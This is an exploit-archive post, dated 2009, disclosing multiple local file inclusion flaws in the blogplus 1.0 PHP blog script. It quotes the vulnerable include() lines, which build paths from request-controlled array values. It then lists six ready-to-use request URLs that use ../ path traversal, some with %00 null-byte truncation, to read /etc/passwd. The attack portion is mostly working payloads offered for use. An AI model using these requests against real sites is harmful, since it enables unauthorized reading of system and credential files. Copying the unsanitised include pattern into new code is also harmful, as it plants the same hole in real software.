[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : blogplus 1.0 Multiple Local File Inclusion Vulnerabilities
# Published : 2009-03-26
# Author : ahmadbady
# Previous Title : Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
# Next Title : Acute Control Panel 1.0.0 (SQL/RFI) Multiple Remote Vulnerabilities


--:local file include:--
                       ---------------------------------  
script:blog+ v1.0
   
----------------------------------------------
download from:http://www.ziddu.com/download/3151643/blogplus_v1.0_final.zip.html
   
----------------------------------------------

...............................................
vul:/includes/

block_center_down.php = $block_center_down_file = $row_mysql_blocks_center_down['file']; line 6
  include ("blocks/".$block_center_down_file.""); line 7 

block_center_top..php = $block_center_top_file = $row_mysql_blocks_center_top['file']; 6
  include ("blocks/".$block_center_top_file.""); 7

-------------------------------------------
vul:/includes/

block_left.php = $block_left_file = $row_mysql_blocks_left['file']; line 8
  include ("blocks/".$block_left_file.""); 9


block_right.php = $block_right_file = $row_mysql_blocks_right['file']; 6
  include ("blocks/".$block_right_file.""); 7


line1; window_down.php = <?php include ("themes/".$row_mysql_bloginfo['theme']."/down.html"); ?>

line1; window_top.php = <?php include ("themes/".$row_mysql_bloginfo['theme']."/top.html"); ?>


-------------------------------------------
-------------------------------------------
xpl:

/path/includes/block_center_down.php?row_mysql_blocks_center_down[file]=../../../../../../etc/passwd
/path/includes/block_center_top.php?row_mysql_blocks_center_top[file]=../../../../../../etc/passwd
/path/includes/block_left.php?row_mysql_blocks_left[file]=../../../../../../etc/passwd
/path/includes/block_right.php?row_mysql_blocks_right[file]=../../../../../../etc/passwd
/path/includes/window_down.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00
/path/includes/window_top.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady  [kivi_hacker666@yahoo.com]

---------------------------------------------------

# www.Syue.com [2009-03-26]